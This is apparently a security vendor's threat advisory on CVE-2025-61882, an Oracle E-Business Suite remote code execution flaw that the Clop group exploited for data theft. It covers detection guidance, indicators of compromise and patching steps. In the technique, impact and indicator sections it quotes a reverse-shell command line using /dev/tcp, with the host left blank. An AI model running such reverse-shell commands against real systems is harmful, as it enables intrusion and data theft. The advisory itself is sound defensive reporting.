Oracle E-Business Suite Zero-Day Exploited in Clop Data Theft Attacks (CVE-2025-61882)
October 6th, 2025
Critical
Our Cyber Threat Intelligence Unit is monitoring active exploitation of a critical, unauthenticated remote code execution vulnerability in Oracle E-Business Suite (EBS), identified as CVE-2025-61882. The vulnerability resides in the Concurrent Processing / BI Publisher Integration component and carries a CVSS v3.1 base score of 9.8 (Critical) due to its pre-authentication exposure and ease of exploitation. Oracle has issued an emergency Security Alert to address this vulnerability, confirming that affected versions include EBS 12.2.3 through 12.2.14. Installation of the October 2023 Critical Patch Update is required prior to applying this emergency fix. Incident responders at Mandiant and Google Threat Intelligence Group attribute the activity to the Clop extortion group, which used this zero-day in its August 2025 data-theft campaign targeting enterprise resource planning (ERP) environments.
Technical Details
CVE ID: CVE-2025-61882
Severity: Critical (9.8).
Affected Versions: EBS 12.2.3 – 12.2.14.
Attack Type: Unauthenticated remote code execution in Oracle E-Business Suite Concurrent Processing (BI Publisher Integration).
Exploit Method: Attackers send crafted HTTP requests to trigger arbitrary OS command execution on vulnerable servers. Observed activity includes spawning reverse shells and interactive sessions.
Exploit Artifacts: Threat actors shared a leaked archive containing a readme and Python scripts (exp.py, server.py) to trigger the flaw and gain shell access. Oracle listed these filenames and associated hashes as indicators of compromise (IOCs).
Delivery Vector: Unauthenticated HTTP exploitation of EBS BI Publisher Integration interfaces accessible from the internet.
Technique: Remote execution of arbitrary OS commands (sh -c /bin/bash -i >& /dev/tcp// 0>&1) resulting in attacker-controlled shells, file exfiltration, and post-exploitation extortion.
Patch Note: Oracle issued an emergency update requiring the October 2023 CPU as a dependency before deployment.
Impact
Critical Remote RCE Exposure: Allows unauthenticated attackers to gain complete control of EBS application servers.
Operational Impact: Observed reverse-shell activity (sh -c /bin/bash -i >& /dev/tcp// 0>&1) enables interactive control for data exfiltration and lateral movement.
Exploitation Scale: A public exploit archive and widespread internet-facing EBS instances increase the risk of mass exploitation and copycat campaigns.
Business Consequence: Compromise may lead to theft of financial, HR, and supply-chain records, followed by Clop-style extortion emails threatening public leak of stolen data.
Detection Method
Network & Application Indicators:
Monitor for suspicious HTTP GET/POST requests to EBS endpoints originating from:
200[.]107[.]207[.]26
185[.]181[.]60[.]11
Review logs for requests targeting BI Publisher Integration or Concurrent Processing URLs without authentication headers.
Host & Process Indicators:
Detect command patterns indicative of reverse shell invocation:
sh -c /bin/bash -i >& /dev/tcp// 0>&1
Flag unexpected EBS processes spawning Python interpreters, shell sessions, or outbound network connections.
Hunt for large archive creation events or unusual file reads performed by EBS process owners.
Incident Response Indicators:
Correlate technical findings with receipt of Clop-style extortion emails claiming EBS data theft.
If present, treat as a high-priority security incident and preserve forensic evidence for IR analysis.
Indicators of Compromise
Type | Indicator |
File Hash | 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d |
File Hash | aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 |
File Hash | 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b |
Command Line | sh -c /bin/bash -i >& /dev/tcp// 0>&1 |
IP Address | 200[.]107[.]207[.]26 |
IP Address | 185[.]181[.]60[.]11 |
Recommendations
Apply Oracle’s emergency security update for CVE-2025-61882 immediately.
Confirm the October 2023 Critical Patch Update is installed beforehand.Restrict access to EBS web interfaces and BI Publisher components to internal networks or VPNs; block internet exposure.
Enforce least-privilege principles for EBS administrative and service accounts; enable MFA for privileged logins.
Continuously monitor logs and endpoint telemetry for IOC matches and abnormal process activity.
If exploitation is suspected:
Isolate affected systems from the network.
Preserve logs and evidence for forensic investigation.
Rotate credentials and API keys associated with the EBS environment.
Notify legal and communications teams if extortion communications are received.
Conclusion
CVE-2025-61882 is a critical, unauthenticated remote code execution vulnerability that poses an immediate and severe threat to organizations running Oracle E-Business Suite 12.2.3 – 12.2.14. Its unauthenticated attack surface, public exploit availability, and confirmed use by Clop operators make rapid patch deployment imperative. We urge organizations to apply Oracle’s emergency update (with October 2023 Critical Patch Update prerequisite), hunt for the listed IOCs, and prepare incident-response plans for potential extortion scenarios linked to data theft.